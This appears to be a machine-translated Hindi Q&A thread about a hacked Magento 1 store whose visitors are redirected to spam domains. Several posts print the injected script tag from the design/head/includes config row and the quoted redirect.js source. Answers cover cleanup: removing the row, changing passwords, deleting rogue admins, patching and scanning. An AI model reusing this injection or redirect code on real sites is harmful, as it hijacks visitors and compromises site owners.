वेबसाइट दूसरे url पर रीडायरेक्ट करना शुरू कर देती है

9

Maybe it's infected by some virus.

मेरी वेबसाइट इन संक्रमित URL पर पुनर्निर्देशित करना शुरू कर देती है।

http://mon.setsu.xyz
और कुछ समय https://tiphainemollard.us/index/?1371499155545
संक्रमित लिंक

मैंने क्या हल किया।

  1. टिप्पणी .htaccess फ़ाइल (कुछ नहीं होता)
  2. टिप्पणी में फ़ोल्डर शामिल है (कुछ नहीं होता)
  3. स्कैन किया हुआ पूरा सर्वर (कुछ भी नहीं पाया गया वायरस मैलवेयर)
  4. डेटाबेस से बदला हुआ CSS, मीडिया और js पथ सिर्फ यह सुनिश्चित करने के लिए कि उसका PHP या कोई js कर रहा है (कुछ भी नहीं)
  5. select * from core_config_data where path like '%secure%';सभी लिंक ठीक हैं अद्यतन

मैंने गुगली की और इस पर कई लेख लिखे गए लेकिन उनका सुझाव है कि यह एक ब्राउज़र समस्या थी या मेरा सिस्टम संक्रमित है। इस पर एक लेख भले ही मैं अपने फोन पर या अपने निजी लैपटॉप पर साइट खोलता हूं, मुद्दे समान हैं।

अद्यतन २

मुझे डेटाबेस में पंक्ति मिली जो प्रभावित है। (जैसा कि बोरिस के। भी कह रहे हैं)

में core_config_data तालिका design/head/includes मूल्य एक है

<script src="<a href="https://melissatgmt.us/redirect_base/redirect.js">https://melissatgmt.us/redirect_base/redirect.js</a>" id="1371499155545"></script>

जिसे पेज लोड पर हेड सेक्शन में डाला जाएगा।

यदि आप उपरोक्त URL पर जाते हैं तो आपको रीडायरेक्ट की एक स्क्रिप्ट मिलेगी जो कि है 

   var redirChrome;
var isToChrome = document.currentScript.getAttribute('data-type');

if((isToChrome == 1 && navigator.userAgent.indexOf("Chrome") != -1) || !isToChrome){

 var idToRedirect = document.currentScript.getAttribute('id'); 

window.location.replace('https://tiphainemollard.us/index/?'+idToRedirect);
}

क्लाइंट वेबसाइट दोपहर से काम कर रही है जब मैंने उस स्क्रिप्ट को हटा दिया। But the main problem is how that script inserted into the database.

एक पैच भी पुराना है इसलिए मैंने उस पैच को भी अपडेट किया।

अद्यतन 3 साइट फिर से संक्रमित है। यह एडमिन सेक्शन में डाला गया स्क्रिप्ट है ( एडमिन-> कॉन्फ़िगरेशन-> जनरल-> डिज़ाइन-> HTML हेड-> विविध स्क्रिप्ट ) व्यवस्थापक

और डेटाबेस कॉलम में डेटाबेस

मुझे नहीं पता कि अब क्या करना है। जैसा कि मैंने हर पासवर्ड को बदल दिया, सभी पुराने उपयोगकर्ताओं को हटा दिया।

अद्यतन 3

अब तक वह त्रुटि नहीं आई है, इसलिए इसका मतलब है कि उपरोक्त चरणों का पालन करके हम इस समस्या को दूर कर सकते हैं।

अद्यतन :: 4 हमेशा पैच स्थापित करें क्योंकि यह परियोजनाओं में मेरी मदद करता है ताकि इन प्रकार के मुद्दों के लिए स्टोर कम हो और पैच भी महत्वपूर्ण हैं। अपनी वेबसाइट पर मुद्दों की जांच करने के लिए https://magescan.com/ का उपयोग कर सकते हैं ।

magento-1  url  redirect 
inrsaurabh
स्रोत
आपकी प्रणाली प्रभावित हो सकती है कृपया इसे जांचें। अपने ब्राउज़र की जाँच करें।
राम चंद्रन M
@ रामचंद्रन जब मैं इस यूआरएल के बारे में लगभग हर एक सुझाव है कि यह ब्राउज़र मुद्दा था। मैंने अपने फोन में भी उसी मुद्दे पर साइट खोली।
insaurabh
कृपया अपनी वेबसाइट url
राम चंद्रन M
1
मैंने <script src = "<a href =" melissatgmt.us/redirect_base/redirect.js "> https : //… > "id =" 1371499155545 "> </ script / design / head / से हटा दिया। यह अभी भी काम नहीं किया। और जब मैंने अपनी वेबसाइट देखी, तो वह javascrip कोड फिर से दिखाई दे रहा है। क्या आपके पास कोई विचार है? वेबसाइट का पता hdvideodepot.com है
मार्क
1
क्या आप कृपया Magento संस्करण टैग जोड़ सकते हैं?
sv3n

जवाबों:

6

मुझे core_config_dataटेबल के नीचे इंजेक्शन का कोड मिला design/head/includes। इसे हटा दिया और अब साइट वापस सामान्य हो गई है।

अद्यतन: जैसा कि सभी ने उल्लेख किया है, यह आज सुबह फिर से हुआ। इस बार मैंने इसके तहत व्यवस्थापक पैनल से अधिक आसानी से छुटकारा पा लिया System > Configuration > General > Design > HTML Head > Miscellaneous Scripts। यह एक बड़ी भेद्यता है, मुझे आशा है कि Magento एक पैच पर काम कर रहा है।

UPDATE 2: स्क्रिप्ट फिर से आई, इसलिए मैंने db पासवर्ड को बदल दिया, कैश को साफ़ किया। लगभग एक घंटे बाद, स्क्रिप्ट वापस आ गई है। तो मुझे नहीं लगता कि यह db के माध्यम से जोड़ा जा रहा है। मैंने बस अपना व्यवस्थापक पासवर्ड बदल दिया है, चलो देखते हैं कि क्या यह फिर से वापस आता है।

अद्यतन 3: जब से मैंने अपने प्रभावित दोनों साइटों पर कल व्यवस्थापक पासवर्ड बदल दिया, लगभग 24 घंटे बाद दोनों अभी भी साफ हैं।

बोरिस के।
स्रोत
2
वाह, यह एक बड़ा सुरक्षा उल्लंघन है, किसी भी विचार यह किस तरह की भेद्यता का कारण बना?
येहिया ए। सलम
3
Magento के पुराने संस्करणों में एक छेद होना चाहिए। मेरे पास Magento 2.1 पर निर्मित एक साइट है जो प्रभावित नहीं हुई, लेकिन संस्करण 2 के नीचे की प्रत्येक साइट पुनर्निर्देशित हो रही है।
बोरिस के।
यह एक बहुत बड़ा सुरक्षा मुद्दा है। क्या किसी को पता है कि तालिका में कोड को कैसे इंजेक्ट किया गया था? वह तालिका है, जहाँ व्यवस्थापक क्षेत्र से, हम वेबसाइट के पाद लेख / शीर्ष लेख में शैलियाँ और जावास्क्रिप्ट जोड़ सकते हैं। एक हैकर समझौता कैसे कर सकता है? क्या इसका मतलब है कि उनके पास व्यवस्थापक तक पहुंच है?
मूंगफली
इसे हटाने के बाद वापस मिलता रहता है, निश्चित नहीं है कि क्या करना है
येहिया ए.सालम
मुझे सिस्टम> अनुमतियाँ> उपयोगकर्ताओं पर दुर्भावनापूर्ण उपयोगकर्ताओं का पता चला। उन्हें हटाने के बाद (और पहले टेबल core_config_data को ठीक करना और एडमिन का पासवर्ड बदलना), यह स्थिर लगता है, लेकिन मैं जानना चाहता हूं कि पहली बार में कैसे हुआ। छेद / पिछले दरवाजे अभी भी हो सकते हैं और यह एक रहस्य है।
मूंगफली
3

एक और Magento साइट पर एक ही मुद्दा। मुझे पता चला कि पेज के HEAD सेक्शन में एक स्क्रिप्ट इंजेक्ट की गई है, जो मेलिस्साटग्म्टस (तब दूसरे डोमेन में बदल गई) से redirect_base / redirect.js का अनुरोध करती है, लेकिन यह पता नहीं लगा सकती कि यह गंदगी कैसे इंजेक्ट की जाती है।

अद्यतन : जैसा कि दूसरों द्वारा उल्लेख किया गया है, ने core_config_data तालिका में प्रविष्टि पाई और उसे हटा दिया, लेकिन अगले पृष्ठ पर रिकॉर्ड वापस आ गया। मैंने db पासवर्ड बदल दिया है और अब यह पराजित होता दिख रहा है। मुझे यकीन नहीं है कि पासवर्ड परिवर्तन अंतिम समाधान है, लेकिन वैसे भी एक सुरक्षा सुधार है।

UPDATE 2 : जैसा कि Jix Sas ने कहा है, Magento प्रशासन में कॉन्फिग से एक्सेस करना सीधे डेटाबेस टेबल तक पहुंचने की तुलना में एक आसान उपाय है। लेकिन गंदगी हर 10/15 मिनट में वापस आती रहती है।

UPDATE 3 : परिवर्तित पासवर्ड, कुछ सीएमएस पेजों (ग्राहक-सेवा और अब-हमारे) को बदला और सहेजा गया, जो किसी भी तरह से संक्रमित, अक्षम कैशे, कई बार कैशे को साफ करने के बाद (हर चेक और 'संक्रमित' सीएमएस पेज को बचाने के लिए) सं। पिछले 8 घंटों के दौरान अधिक स्क्रिप्ट इंजेक्ट की गई।

कंसुलांजा इंफॉर्मेटिका
स्रोत
हां, उर सही, मुझे वह पंक्ति मिली जो प्रभावित है।
अरसौरभ
ध्यान दें कि मैगनेटो व्यवस्थापक समस्या के बिना सुलभ है और वेब लॉग में मैं देख सकता हूं कि बॉट एक्सेस प्रभावित नहीं हैं। मुझे लगता है कि मैलवेयर सीमांत तक सीमित है और ब्राउज़र के उपयोगकर्ता एजेंट की जांच करता है।
ConsuLanza Informatica
तो क्या आप जानते हैं कि इसे कहां से इंजेक्ट किया गया था?
येहिया ए। सलम जूल
हाँ मैं पुष्टि कर सकता है कि यह हर 10/15 मिनट वापस आ रहा रखता है, डेटाबेस से प्रविष्टि हटाने के बाद भी
येहिया A.Salam
2

मैंने व्यवस्थापक पैनल में पथ परिवर्तित किया app/etc/local.xmlऔर यह मदद करता है। स्क्रिप्ट अब नहीं जोड़ी गई है design/head/includes

स्पष्टीकरण:

पूर्व में app/etc/local.xmlमैं बदल <admin> <routers> <adminhtml> <args> <frontName><![CDATA[new_admin_path]]></frontName> </args> </adminhtml> </routers> </admin>गया था sitedomain.com/admin, और अब व्यवस्थापक पैनल के लिए रास्ता होगा sitedomain.com/new_admin_path

यूजेनिया
स्रोत
क्षमा करें, आपको वह नहीं मिला जो आपने किया था, कृपया स्पष्ट करेंwhich path u chagned
inrsaurabh
एप्लिकेशन / etc / local.xml में मैंने <admin> <routers> <adminhtml> <args> <frontName><![CDATA[new_admin_path]]></frontName> </args> </adminhtml> </routers> </admin>पहले बदलाव किया था यह sitedomain.com/admin था, और अब व्यवस्थापक पैनल का पथ sitedomain.com/new_admin_path होगा
यूजेनिया
ठीक है, मुझे पता चला कि उर क्या सुझाव दे रहा है
inrsaurabh
1

यह इतनी बड़ी राहत है, मैंने सुबह से 10 बार अपनी साइट को बहाल किया है।

बग बार-बार आता रहता है।

अंतिम समाधान क्या है?

DB पासवर्ड बदलें? रूट पासवर्ड बदलें? कोई पैच जारी किया गया है?

मुझे यकीन नहीं है कि यह संबंधित है तो मुझे सुरक्षा परामर्श से ईमेल नीचे मिला है

प्रिय महोदय या महोदया,

हम स्विट्जरलैंड, पोलैंड, और नीदरलैंड में स्थित एक Magento विकास कंपनी Hatimeria हैं।

हाल ही में, हमने एक नए क्लाइंट के साथ काम करना शुरू किया, और उसके पुराने सर्वर को संभाला। जिस समय हमने सर्वर को एक्सेस किया, हम कुछ मैलवेयर पर लड़खड़ा गए, जिसके साथ हैकर्स क्लाइंट के सर्वर को संभालने में सक्षम थे, और अन्य वेबसाइटों को हैक करने के लिए इसे "हैकर्स मशीन" के रूप में उपयोग करते थे। बेशक ग्राहक को पता नहीं था कि यह उसके सर्वर पर हो रहा था।

हमें आपकी वेबसाइट का डेटाबेस क्रेडेंशियल मिला जो उस सर्वर के माध्यम से हैक किया गया था। बेशक, हम इसके साथ कुछ नहीं करेंगे, लेकिन मैं आपसे संपर्क करने के लिए बाध्य हूं और आपको बता दूं कि क्या चल रहा है। हैक Magento Cacheleak भेद्यता के माध्यम से किया गया था, जो अभी भी आपके स्टोर पर अभी मौजूद हो सकता है।

मैं आपको सलाह देता हूं कि तुरंत उस भेद्यता का ध्यान रखें, और अपना डेटाबेस पासवर्ड बदलें। हमारे तकनीशियनों का कहना है कि इसमें लगभग 30 मिनट लगने चाहिए।

वेबसाइट MageReport पर आप देख सकते हैं कि आपकी वेबसाइट और क्या-क्या असुरक्षित हो सकती है: https://www.magereport.com/scan-?s=

इस ईमेल का मेरा प्राथमिक उद्देश्य ग्राहक का अधिग्रहण करना नहीं है, लेकिन अगर आपको अपने स्टोर को सुरक्षित रखने में सहायता की आवश्यकता है, या कोई अन्य प्रश्न हैं, तो हम मदद करने में प्रसन्न हैं।

तरह तरह के संबंध में, थॉमस टान्नर

तो मुझे लगता है कि समाधान डीबी पासवर्ड बदलें है

मोहित खत्री
स्रोत
1

हमें यह समझने की जरूरत है कि इस तरह के स्पैम इंजेक्शन का मुख्य कारण क्या है

यदि आपकी साइट इंजेक्ट की गई थी, तो कृपया अपनी साइट को सभी तीन मैलवेयर स्कैन पर देखें

https://magescan.com

https://www.magereport.com

https://sitecheck.sucuri.net/

मुझे यह महसूस होता है कि यह गायब सुरक्षा पैच के कारण है! यदि आप एक पैच गायब देखते हैं, तो इसे इस टॉपिक के अनुसार पढ़ें

  1. परिवर्तन होस्टिंग एक्सेस पासवर्ड बदलें डेटाबेस पासवर्ड बदलें व्यवस्थापक लॉगिन पासवर्ड बदलें पासवर्ड और डाउनलोड यूआरएल और सार्वजनिक दृश्य से / आरएसएस / छिपाएँ।

  2. पूर्ण साइट वायरस स्कैन करें, यदि आपका स्वयं ऐसा नहीं कर सकते हैं तो आपका होस्टिंग प्रदाता साइट को स्कैन करने में सक्षम है।

  3. Sysytem -> उपयोगकर्ताओं पर जाएं और देखें कि क्या खाते में कोई UNAUTHORIZED पंजीकृत उपयोगकर्ता हैं।

चिह्न
स्रोत
0

मैंने मुद्दा तय किया। इसके बाद भी मैंने मूल्य <script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script>से core_config_dataतालिका से fhis फ़ाइल को हटा दिया design/head/includes। इसने समस्या का समाधान नहीं किया। स्क्रिप्ट कोड बार-बार डाला गया। समस्या को ठीक करने के लिए, बस इन तीन चरणों का पालन करें।

  1. core_config_dataतालिका से स्क्रिप्ट कोड हटाएं design/head/includes
  2. डेटाबेस पासवर्ड को app/etc/local.xmlक्रेडेंशियल सहित बदलें ।
  3. इस आदेश का उपयोग करके रूट Magento फ़ोल्डर में कैश साफ़ करें rm -rf var/cache/*

ps मैंने पूरा दिन बिताया। उम्मीद है, यह आपके लिए काम करेगा। और सुनिश्चित करें कि हर समय फ़ाइल का बैकअप लें।

निशान
स्रोत
0

ठीक यही बात मेरे साथ आज भी हुई! उसी वेबसाइट पर रीडायरेक्ट करना। हालाँकि, मुझे कॉन्फ़िगरेशन> डिज़ाइन> html हेड> मिस स्क्रिप्ट के तहत मैगेंटो एडमिन पैनल में स्क्रिप्ट मिली। यह स्क्रिप्ट थी: <script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script> मैंने इसे वहां से हटा दिया और वेबसाइट ठीक काम कर रही है। मेरे पास वह फ़ोल्डर नहीं है जो आपने कहा था कि आपको स्क्रिप्ट मिली है। कोई भी विचार जहां यह हो सकता है? (जैसा कि आप एचटीएमएल हेड> बिस्किट स्क्रिप्ट का मार्ग जानते हैं)

यह भी, आपने हाल ही में क्या किया? शायद हम इसका कारण जान सकते हैं? मेरे लिए, मैंने एक मुफ्त न्यूज़लेटर पॉपअप स्थापित किया जो इसका कारण हो सकता है। आप क्या?

अद्यतन: अच्छी तरह से अब स्क्रिप्ट वापस आ गया है। कोई मुझे बताए कि मैं इसे हटाने के लिए डेटाबेस से इस स्क्रिप्ट का उपयोग कैसे कर सकता हूं?

UPDATE 2: जैसा कि मार्क ने कहा है, स्क्रिप्ट हटाना और डेटाबेस पासवर्ड बदलना इस स्क्रिप्ट को वापस आने से रोकता है। यदि किसी को इस भेद्यता का नाम पता है, या यदि ग्राहकों के भुगतान के लिए कोई खतरा है, तो कृपया हमें बताएं।

جيلبير
स्रोत
हमारी साइट का प्रयोग करके, आप स्वीकार करते हैं कि आपने हमारी Cookie Policy और निजता नीति को पढ़ और समझा लिया है।
Licensed under cc by-sa 3.0 with attribution required.